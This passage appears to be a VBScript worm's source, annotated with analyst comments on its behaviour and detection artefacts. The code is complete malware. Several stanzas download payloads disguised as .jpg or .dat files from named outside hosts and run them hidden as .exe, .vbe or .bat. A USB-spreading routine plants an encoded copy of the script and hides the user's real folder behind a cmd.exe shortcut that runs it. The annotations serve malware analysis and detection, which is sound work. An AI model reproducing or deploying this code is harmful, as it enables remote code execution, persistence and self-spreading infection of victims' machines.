' the host in "first" with MSXML2.XMLHTTP, saves the body through ADODB.Stream
' to <systemdrive>\security\, copies it to zoneh.exe, deletes the .dat, and
' runs the .exe hidden if its size equals the Content-Length response header.
' The extension seen on the wire (.dat) is not the type that gets executed,
' and the size check only detects truncation, so neither is a trust signal.
' Detection: script host writing an .exe under <systemdrive>\security and
' launching it.
Set wshshell=createobject("wscript.shell") | |
first = "http://zoneh.me.pn/" | |
secon = "zoneh." | |
ext = "dat" | |
strFileURL = ""&first&""&secon&""&ext&"" | |
third = ""&var1&"\security\" | |
strHDLocation = ""&third&""&secon&""&ext&"" | |
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") | |
objXMLHTTP.open "GET", strFileURL, FALSE | |
objXMLHTTP.send() | |
If objXMLHTTP.Status = 200 Then | |
Set objADOStream = _ | |
CreateObject("ADODB.Stream") | |
objADOStream.Open | |
objADOStream.Type = 1 'adTypeBinary | |
objADOStream. _ | |
Write _ | |
objXMLHTTP _ | |
.ResponseBody | |
objADOStream. _ | |
Position = 0 | |
Set objFSO = _ | |
Createobject("Scripting.FileSystemObject") | |
If objFSO. _ | |
Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation | |
Set objFSO = Nothing | |
objADOStream _ | |
.SaveToFile strHDLocation | |
objADOStream.Close | |
Set objADOStream = Nothing | |
End If | |
' a = size announced by the server; b (below) = size of the file on disk.
a = objXMLHTTP.getResponseHeader("Content-Length") | |
Set objXMLHTTP = Nothing | |
'msgbox"2" | |
Set loFSO = CreateObject("Scripting.FileSystemObject") | |
loFSO.CopyFile ""&third&"zoneh.dat",""&third&"zoneh.exe" | |
loFSO.DeleteFile ""&third&"zoneh.dat" | |
Set oFSO = CreateObject("Scripting.FileSystemObject") | |
stFichier = ""&third&"zoneh.exe" | |
Set oFl = oFSO.GetFile(stFichier) | |
b = oFl.size | |
If ""&a&"" = ""&b&"" Then | |
Set variable=createobject("wscript.shell") | |
variable.run """"&var1&"\security\zoneh.exe""",0,False | |
Else | |
End If | |
' | |
'--------------------------------------------------------------------------- | |
' BUMP | |
'--------------------------------------------------------------------------- | |
' | |
' Download-and-execute stanza ("bump"). Fetches bump.jpg over plain HTTP from
' the host in "first", saves it to <systemdrive>\security\, copies it to
' bump.vbe, deletes the .jpg, and runs the .vbe hidden if its size equals the
' Content-Length response header. The payload travels with an image extension
' but is executed as an encoded script, so a content-type or magic-byte
' mismatch on the download is a useful network detection.
Set wshshell=createobject("wscript.shell") | |
first = "http://users2.Jabry.com/mysiteweb2/" | |
secon = "bump." | |
ext = "jpg" | |
strFileURL = ""&first&""&secon&""&ext&"" | |
third = ""&var1&"\security\" | |
strHDLocation = ""&third&""&secon&""&ext&"" | |
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") | |
objXMLHTTP.open "GET", strFileURL, FALSE | |
objXMLHTTP.send() | |
If objXMLHTTP.Status = 200 Then | |
Set objADOStream = _ | |
CreateObject("ADODB.Stream") | |
objADOStream.Open | |
objADOStream.Type = 1 'adTypeBinary | |
objADOStream. _ | |
Write _ | |
objXMLHTTP _ | |
.ResponseBody | |
objADOStream. _ | |
Position = 0 | |
Set objFSO = _ | |
Createobject("Scripting.FileSystemObject") | |
If objFSO. _ | |
Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation | |
Set objFSO = Nothing | |
objADOStream _ | |
.SaveToFile strHDLocation | |
objADOStream.Close | |
Set objADOStream = Nothing | |
End If | |
' a = size announced by the server; b (below) = size of the file on disk.
a = objXMLHTTP.getResponseHeader("Content-Length") | |
Set objXMLHTTP = Nothing | |
'msgbox"2" | |
Set loFSO = CreateObject("Scripting.FileSystemObject") | |
loFSO.CopyFile ""&third&"bump.jpg",""&third&"bump.vbe" | |
loFSO.DeleteFile ""&third&"bump.jpg" | |
Set oFSO = CreateObject("Scripting.FileSystemObject") | |
stFichier = ""&third&"bump.vbe" | |
Set oFl = oFSO.GetFile(stFichier) | |
b = oFl.size | |
If ""&a&"" = ""&b&"" Then | |
Set variable=createobject("wscript.shell") | |
variable.run """"&var1&"\security\bump.vbe""",0,False | |
Else | |
End If | |
'--------------------------------------------------------------------------- | |
' AV 0 | |
'--------------------------------------------------------------------------- | |
' | |
' Download-and-execute stanza ("av"). Fetches av.jpg over plain HTTP from the
' host in "first", saves it to <systemdrive>\security\, copies it to av.bat,
' deletes the .jpg, and runs the batch hidden if its size equals the
' Content-Length response header. What the batch does is decided by the
' server at download time and is not visible in this script; the section
' title ("AV 0") suggests it targets security software - unconfirmed.
Set wshshell=createobject("wscript.shell") | |
first = "http://newsonline.125mb.com/" | |
secon = "av." | |
ext = "jpg" | |
strFileURL = ""&first&""&secon&""&ext&"" | |
third = ""&var1&"\security\" | |
strHDLocation = ""&third&""&secon&""&ext&"" | |
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") | |
objXMLHTTP.open "GET", strFileURL, FALSE | |
objXMLHTTP.send() | |
If objXMLHTTP.Status = 200 Then | |
Set objADOStream = _ | |
CreateObject("ADODB.Stream") | |
objADOStream.Open | |
objADOStream.Type = 1 'adTypeBinary | |
objADOStream. _ | |
Write _ | |
objXMLHTTP _ | |
.ResponseBody | |
objADOStream. _ | |
Position = 0 | |
Set objFSO = _ | |
Createobject("Scripting.FileSystemObject") | |
If objFSO. _ | |
Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation | |
Set objFSO = Nothing | |
objADOStream _ | |
.SaveToFile strHDLocation | |
objADOStream.Close | |
Set objADOStream = Nothing | |
End If | |
' a = size announced by the server; b (below) = size of the file on disk.
a = objXMLHTTP.getResponseHeader("Content-Length") | |
Set objXMLHTTP = Nothing | |
'msgbox"2" | |
Set loFSO = CreateObject("Scripting.FileSystemObject") | |
loFSO.CopyFile ""&third&"av.jpg",""&third&"av.bat" | |
loFSO.DeleteFile ""&third&"av.jpg" | |
Set oFSO = CreateObject("Scripting.FileSystemObject") | |
stFichier = ""&third&"av.bat" | |
Set oFl = oFSO.GetFile(stFichier) | |
b = oFl.size | |
If ""&a&"" = ""&b&"" Then | |
Set variable=createobject("wscript.shell") | |
variable.run """"&var1&"\security\av.bat""",0,False | |
Else | |
End If | |
' | |
'--------------------------------------------------------------------------- | |
' system . x | |
'--------------------------------------------------------------------------- | |
' Download-and-execute stanza ("system"). Fetches system.jpg over plain HTTP
' from the host in "first", saves it to <systemdrive>\security\, copies it to
' system.exe, deletes the .jpg, and runs the .exe hidden if its size equals
' the Content-Length response header. Detection: an executable named
' system.exe under <systemdrive>\security started by a script host.
Set wshshell=createobject("wscript.shell") | |
first = "http://mysiteweb.eu5.org/" | |
secon = "system." | |
ext = "jpg" | |
strFileURL = ""&first&""&secon&""&ext&"" | |
third = ""&var1&"\security\" | |
strHDLocation = ""&third&""&secon&""&ext&"" | |
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") | |
objXMLHTTP.open "GET", strFileURL, FALSE | |
objXMLHTTP.send() | |
If objXMLHTTP.Status = 200 Then | |
Set objADOStream = _ | |
CreateObject("ADODB.Stream") | |
objADOStream.Open | |
objADOStream.Type = 1 'adTypeBinary | |
objADOStream. _ | |
Write _ | |
objXMLHTTP _ | |
.ResponseBody | |
objADOStream. _ | |
Position = 0 | |
Set objFSO = _ | |
Createobject("Scripting.FileSystemObject") | |
If objFSO. _ | |
Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation | |
Set objFSO = Nothing | |
objADOStream _ | |
.SaveToFile strHDLocation | |
objADOStream.Close | |
Set objADOStream = Nothing | |
End If | |
' a = size announced by the server; b (below) = size of the file on disk.
a = objXMLHTTP.getResponseHeader("Content-Length") | |
Set objXMLHTTP = Nothing | |
'msgbox"2" | |
Set loFSO = CreateObject("Scripting.FileSystemObject") | |
loFSO.CopyFile ""&third&"system.jpg",""&third&"system.exe" | |
loFSO.DeleteFile ""&third&"system.jpg" | |
Set oFSO = CreateObject("Scripting.FileSystemObject") | |
stFichier = ""&third&"system.exe" | |
Set oFl = oFSO.GetFile(stFichier) | |
b = oFl.size | |
If ""&a&"" = ""&b&"" Then | |
Set variable=createobject("wscript.shell") | |
variable.run """"&var1&"\security\system.exe""",0,False | |
Else | |
End If | |
' | |
'--------------------------------------------------------------------------- | |
' explorer . x | |
'--------------------------------------------------------------------------- | |
' Download-and-execute stanza ("explorer"). Builds its URL from "first",
' "secon" and "ext", saves the response to <systemdrive>\kernel\explorer.jpg,
' copies it to explorer.exe, deletes the .jpg, and runs the .exe hidden if its
' size equals the Content-Length response header. Detection: a file named
' explorer.exe outside %systemroot%, here in a hidden <systemdrive>\kernel
' folder, is a masquerading indicator.
Set wshshell=createobject("wscript.shell") | |
first = "http://mysiteweb.freezoy.com" | |
secon = "explorer." | |
ext = "jpg" | |
strFileURL = ""&first&""&secon&""&ext&"" | |
third = ""&var1&"\kernel\" | |
strHDLocation = ""&third&""&secon&""&ext&"" | |
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") | |
objXMLHTTP.open "GET", strFileURL, FALSE | |
objXMLHTTP.send() | |
If objXMLHTTP.Status = 200 Then | |
Set objADOStream = _ | |
CreateObject("ADODB.Stream") | |
objADOStream.Open | |
objADOStream.Type = 1 'adTypeBinary | |
objADOStream. _ | |
Write _ | |
objXMLHTTP _ | |
.ResponseBody | |
objADOStream. _ | |
Position = 0 | |
Set objFSO = _ | |
Createobject("Scripting.FileSystemObject") | |
If objFSO. _ | |
Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation | |
Set objFSO = Nothing | |
objADOStream _ | |
.SaveToFile strHDLocation | |
objADOStream.Close | |
Set objADOStream = Nothing | |
End If | |
' a = size announced by the server; b (below) = size of the file on disk.
a = objXMLHTTP.getResponseHeader("Content-Length") | |
Set objXMLHTTP = Nothing | |
'msgbox"2" | |
Set loFSO = CreateObject("Scripting.FileSystemObject") | |
loFSO.CopyFile ""&var1&"\kernel\explorer.jpg",""&var1&"\kernel\explorer.exe" | |
loFSO.DeleteFile ""&var1&"\kernel\explorer.jpg" | |
Set oFSO = CreateObject("Scripting.FileSystemObject") | |
stFichier = ""&third&"explorer.exe" | |
Set oFl = oFSO.GetFile(stFichier) | |
b = oFl.size | |
If ""&a&"" = ""&b&"" Then | |
Set variable=createobject("wscript.shell") | |
variable.run """"&var1&"\Kernel\explorer.exe""",0,False | |
Else | |
End If | |
' | |
'--------------------------------------------------------------------------- | |
' update . jpg | |
'--------------------------------------------------------------------------- | |
' Download-and-execute stanza ("update"). Fetches update.jpg over plain HTTP
' from the host in "first", saves it to <systemdrive>\kernel\, copies it to
' Update.exe, deletes the .jpg, and runs the .exe hidden if its size equals
' the Content-Length response header. Because this stanza sits inside the
' hourly loop, whoever controls the host can replace the running payload at
' any time; blocking the listed hosts and removing persistence both matter
' during containment.
Set wshshell=createobject("wscript.shell") | |
first = "http://babybot.125mb.com/" | |
secon = "update." | |
ext = "jpg" | |
strFileURL = ""&first&""&secon&""&ext&"" | |
third = ""&var1&"\kernel\" | |
strHDLocation = ""&third&""&secon&""&ext&"" | |
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP") | |
objXMLHTTP.open "GET", strFileURL, FALSE | |
objXMLHTTP.send() | |
If objXMLHTTP.Status = 200 Then | |
Set objADOStream = _ | |
CreateObject("ADODB.Stream") | |
objADOStream.Open | |
objADOStream.Type = 1 'adTypeBinary | |
objADOStream. _ | |
Write _ | |
objXMLHTTP _ | |
.ResponseBody | |
objADOStream. _ | |
Position = 0 | |
Set objFSO = _ | |
Createobject("Scripting.FileSystemObject") | |
If objFSO. _ | |
Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation | |
Set objFSO = Nothing | |
objADOStream _ | |
.SaveToFile strHDLocation | |
objADOStream.Close | |
Set objADOStream = Nothing | |
End If | |
' a = size announced by the server; b (below) = size of the file on disk.
a = objXMLHTTP.getResponseHeader("Content-Length") | |
Set objXMLHTTP = Nothing | |
'msgbox"2" | |
Set loFSO = CreateObject("Scripting.FileSystemObject") | |
loFSO.CopyFile ""&var1&"\kernel\update.jpg",""&var1&"\kernel\Update.exe" | |
loFSO.DeleteFile ""&var1&"\kernel\update.jpg" | |
Set oFSO = CreateObject("Scripting.FileSystemObject") | |
stFichier = ""&third&"Update.exe" | |
Set oFl = oFSO.GetFile(stFichier) | |
b = oFl.size | |
If ""&a&"" = ""&b&"" Then | |
Set variable=createobject("wscript.shell") | |
variable.run """"&var1&"\kernel\Update.exe""",0,False | |
Else | |
End If | |
' | |
Wend | |
' | |
'--------------------------------------------------------------------------- | |
' !Nf3cT!o|\| Headers | |
'--------------------------------------------------------------------------- | |
' | |
' [analysis] Top-level call into the drive-enumeration routine defined directly below.
' [analysis] It sits after the Wend that closes the preceding loop, so it is reached only once that loop ends.
detecterracines | |
' [analysis] detecterracines: walks every drive known to Scripting.FileSystemObject and, per drive,
' [analysis] either pulls a copy of the script from the drive onto the host or plants a copy on the drive.
' [analysis]   - Drive already holds \config.dat : the file is read and handled by line count (>30, <30, =30).
' [analysis]   - Drive has no \config.dat        : a batch file is written to %temp%\tmp.bat and run hidden,
' [analysis]                                       then a shortcut is created and the real folder is hidden.
' [analysis] Artefacts named in this routine that a responder can search for:
' [analysis]   <drive>\config.dat (set +s +h), <drive>\<first subfolder name>.lnk with cmd.exe as target,
' [analysis]   %systemdrive%\security\blood.dat, %systemdrive%\kernel\r00t3r, %temp%\tmp.bat.
' [analysis] The shortcut arguments run wscript with /e:VBScript.Encode against config.dat; script-host
' [analysis] execution launched from a removable-drive root is the step to alert on or block.
' [analysis] Takes no parameters and returns nothing. Reads MyF, WSHShell and shell, none of which is
' [analysis] assigned inside this Sub (presumably script-level variables; confirm against the full file).
Sub detecterracines() | |
' | |
'--------------------------------------------------------------------------- | |
' Usb f() | |
'--------------------------------------------------------------------------- | |
' | |
Set fsO = CreateObject("Scripting.FileSystemObject") | |
Set wshshell=createobject("wscript.shell") | |
Dim fso, d, dc, s, n | |
' [analysis] dc is the collection of all drives; d is one Drive object per iteration.
Set dc = fso.Drives | |
For Each d in dc | |
racine = d.Driveletter & ":" | |
' [analysis] The argument passed here is `root`, which is not assigned in the visible lines (the value built
' [analysis] on the previous line is `racine`), so which path gets classified cannot be confirmed from this excerpt.
u= detectamovibles(root) | |
'msgbox racine | |
' [analysis] VBScript evaluates And before Or: the IsReady and not-"A:" checks apply only to the "Fixe" case,
' [analysis] while u = "Amovible" alone is enough to enter the branch.
If u = "Amovible" Or u = "Fixe" And d.isready And racine <> "A:" Then | |
' | |
Set fsO = CreateObject("Scripting.FileSystemObject") | |
' [analysis] d is concatenated as a string here; presumably it yields the drive path (e.g. E:), verify dynamically.
If fsO.FileExists(""&d&"\config.dat") Then | |
Dim oFso, f | |
Dim ts, nl | |
Set oFso = CreateObject("Scripting.FileSystemObject") | |
Set f = oFso.OpenTextFile(""&d&"\config.dat", ForReading) | |
' [analysis] After ReadAll, f.Line is the stream's current line number, used below as a line count for the file.
ts = f.ReadAll '-- Rd File | |
' [analysis] Case 1, more than 30 lines: copy the drive's config.dat onto the host.
If ""&f.line&"" > 30 Then | |
f.close | |
' | |
Set oShell = WScript.CreateObject ("WScript.Shell") | |
' [analysis] Both commands run with window style 0 (hidden). The first copies config.dat into
' [analysis] %systemdrive%\security, clears system/hidden on *.dat there and renames it to blood.dat.
oShell.run "cmd /K xcopy /C /H /Y /R """&d&"\config.dat"" ""%systemdrive%\security"" & attrib -s -h ""%systemdrive%\security\*.dat"" & ren ""%systemdrive%\security\*.dat"" blood.dat & EXIT",0 | |
' [analysis] The second copies it into %systemdrive%\kernel, renames *.dat to r00t3r and sets
' [analysis] system+hidden on every file in that folder.
oShell.run "cmd /K xcopy /C /H /Y /R """&d&"\config.dat"" ""%systemdrive%\kernel"" & attrib -s -h ""%systemdrive%\kernel\*.dat"" & ren ""%systemdrive%\kernel\*.dat"" r00t3r & attrib +s +h ""%systemdrive%\kernel\*.*"" & EXIT",0 | |
Set oShell = Nothing | |
End If | |
' | |
Set oFso = CreateObject("Scripting.FileSystemObject") | |
Set f = oFso.OpenTextFile(""&d&"\config.dat", ForReading) | |
' | |
ts = f.ReadAll '-- Read File | |
' [analysis] Case 2, fewer than 30 lines: the drive's config.dat is force-deleted.
If ""&f.line&"" < 30 Then | |
f.close | |
' | |
Set fsO = CreateObject("Scripting.FileSystemObject") | |
fso.deletefile(""&d&"\config.dat"),true | |
End If | |
' | |
Set oFso = CreateObject("Scripting.FileSystemObject") | |
Set f = oFso.OpenTextFile(""&d&"\config.dat", ForReading) | |
' | |
ts = f.ReadAll '-- R" File | |
' [analysis] Case 3, exactly 30 lines: decide by the file's last-modified date.
If ""&f.line&"" = 30 Then | |
f.close | |
Dim stFichier | |
Dim oFl | |
Set oFSO = CreateObject("Scripting.FileSystemObject") | |
stFichier = ""&d&"\config.dat" | |
Set oFl = oFSO.GetFile(stFichier) | |
Set f = ofso.GetFile(stFichier) | |
fdate = f.DateLastModified | |
fname = f.Name | |
' [analysis] DateDiff("d", Now, fdate) is negative when the file was last modified on an earlier day than today.
dtDiffFile = DateDiff("d", Now, fdate) | |
If dtDiffFile < 0 Then | |
' [analysis] Older copy on the drive: it is force-deleted, then a hidden cmd runs "copy /b /y blood.dat +"
' [analysis] inside %systemdrive%\security. That resembles the cmd idiom for refreshing a file's timestamp;
' [analysis] the actual effect should be confirmed dynamically.
fso.DeleteFile(stFichier),true | |
Dim oShell | |
Set oShell = WScript.CreateObject ("WScript.Shell") | |
oShell.run "cmd /K cd/d ""%systemdrive%\security"" & copy /b /y blood.dat + & EXIT",0 | |
Set oShell = Nothing | |
End If | |
End If | |
Else | |
' | |
'--------------------------------------------------------------------------- | |
' u|s|b spr34d | |
'--------------------------------------------------------------------------- | |
' | |
' [analysis] Drive has no config.dat: a batch file is generated at %temp%\tmp.bat.
tmpdir=shell.ExpandEnvironmentStrings("%temp%") | |
nomficl=tmpdir & "\tmp.bat" | |
' msgbox nomfic | |
Set f = fso.OpenTextFile(nomficl, ForWriting , true) | |
' [analysis] Batch contents, in order: delete *.vbe, *.lnk, config.dat, autorun.inf and microsoft.dat from the
' [analysis] drive root; copy the file at MyF onto the drive; rename blood.dat on the drive to config.dat and
' [analysis] mark it system+hidden; delete *.lnk and autorun.inf from %systemdrive%.
' [analysis] MyF is not assigned in the visible lines; presumably it is the path of the host copy (blood.dat).
f.writeline "del/f/q/a """&d&"\*.vbe"" " | |
f.writeline "del/f/q/a """&d&"\*.lnk"" " | |
f.writeline "del/f/q/a """&d&"\config.dat"" " | |
f.writeline "del/f/q/a """&d&"\autorun.inf"" " | |
f.writeline "del/f/q/a """&d&"\microsoft.dat"" " | |
f.writeline "xcopy /C /H /Y /R """&MyF&""" """&d&"\"" " | |
f.writeline "ren """&d&"\blood.dat"" config.dat " | |
f.writeline "attrib +s +H """&d&"\config.dat"" " | |
f.writeline "del/f/q/a ""%systemdrive%\*.lnk"" " | |
f.writeline "del/f/q/a ""%systemdrive%\autorun.inf"" " | |
f.close | |
' | |
' [analysis] The batch runs hidden (0) and the script waits for it to finish (true) before deleting it, so
' [analysis] tmp.bat exists on disk only briefly; process-creation logging is the more reliable evidence source.
Set variable = createobject("wscript.shell") | |
variable.run ""&nomficl&"" ,0,true | |
fso.DeleteFile nomficl, TRUE | |
' | |
'--------------------------------------------------------------------------- | |
' LNK -- 10ver6on l0l | |
'--------------------------------------------------------------------------- | |
' | |
Const ForWriting = 2 | |
RootFolder = ""&d&"" | |
'Const DestinationFile = "FolderList" | |
Set objFSO = CreateObject("Scripting.FileSystemObject") | |
Set objFolder = objFSO.GetFolder(RootFolder) | |
Set colSubfolders = objFolder.Subfolders | |
' [analysis] The loop exits on its first iteration, so objSubfolder is left pointing at the first subfolder
' [analysis] of the drive root; only that one folder is used below.
For Each objSubfolder in colSubfolders | |
Exit For | |
'wscript.echo objSubfolder.Name | |
Next | |
Set oShell = CreateObject("WScript.Shell") | |
sDesktop = WSHShell.SpecialFolders("Desktop") | |
' [analysis] A shortcut named after that subfolder is created in the drive root. Its target is
' [analysis] %windir%\system32\cmd.exe and its arguments start wscript with the VBScript.Encode engine on
' [analysis] config.dat, then open the folder name in explorer.exe so the click still appears to open the folder.
Set oSLink = WSHShell.CreateShortcut(""&d&"\"&objSubfolder.Name&".lnk") | |
strTarget = oShell.ExpandEnvironmentStrings("%windir%") | |
oSLink.TargetPath = strTarget & "\system32\cmd.exe" | |
oSLink.Arguments = "/c start WScRiPt.EXe /e:VBScRIpt.ENcOdE config.dat & C:\WINDOWS\explorer.exe "&objSubfolder.Name&" " | |
' [analysis] WindowStyle 7 starts the target minimized; the icon is taken from SHELL32.dll (resource -4,
' [analysis] presumably the folder icon; confirm on a test system).
oSLink.WindowStyle = 7 | |
oSLink.IconLocation = "%SystemRoot%\system32\SHELL32.dll,-4" | |
oSLink.Description = ""&d&"" | |
oSLink.Save | |
' | |
'--------------------------------------------------------------------------- | |
' +H | |
'--------------------------------------------------------------------------- | |
' [analysis] Error suppression is switched on inside this procedure only from this statement onward.
On Error Resume Next | |
Set objFSo = CreateObject("scripting.FileSystemObject") | |
Set objFile = objFSo.GetFile(""&d&"\"&objSubfolder.Name&".lnk") | |
' | |
' [analysis] Attributes = 1 marks the shortcut read-only.
objFile.Attributes = 1 'R0 | |
'* * * * * * * | |
'************* | |
'* * * * * * * | |
Set objFSO = CreateObject("Scripting.FileSystemObject" ) | |
Set objFolder = objFSO.GetFolder(""&d&"\"&objSubfolder.Name&"") | |
' [analysis] XOR 6 toggles the Hidden (2) and System (4) bits on the real folder. With default Explorer
' [analysis] settings the folder disappears and only the shortcut is shown; the user's data is still on the
' [analysis] drive and reappears once the attributes are cleared or hidden/system items are displayed.
objFolder.Attributes = objFolder.Attributes XOR 6 | |
' | |
End If | |
End If | |
Next | |
End Sub | |
' | |
' [analysis] detectamovibles(drvpath): classifies the drive that contains drvpath.
' [analysis]   drvpath - a path; it is resolved to an absolute path, reduced to its drive name and looked up
' [analysis]             with FileSystemObject.GetDrive.
' [analysis]   Returns "Amovible" when DriveType is 1 (removable) and "Fixe" when it is 2 (fixed disk).
' [analysis]   Any other drive type leaves t unassigned, so the function returns Empty and the caller's
' [analysis]   string comparisons do not match.
Function detectamovibles(drvpath) | |
Dim fso, d, s, t | |
Set fsO = CreateObject("Scripting.FileSystemObject") | |
Set d = fso.GetDrive(fso.GetDriveName(fso.GetAbsolutePathName(drvpath))) | |
Select Case d.DriveType | |
Case 1: t = "Amovible" | |
Case 2: t = "Fixe" | |
End Select | |
detectamovibles = t | |
End Function | |
' | |
'=========================================================================================' | |
' | |
' C0d3 N4me : S4T4n | |
' Cr34t0r : R4PTOR | |
' Created for personal use , modifications or others are not authorized | |
' For more informations, looking 4 me { - CNG4L on Race } | |
' | |
'=========================================================================================' | |
' | |
'''''|| | |
''''''''''''''''''--------------- . . . . . . . | |
'''''''''''''''''' | |
'''''|| | |
' |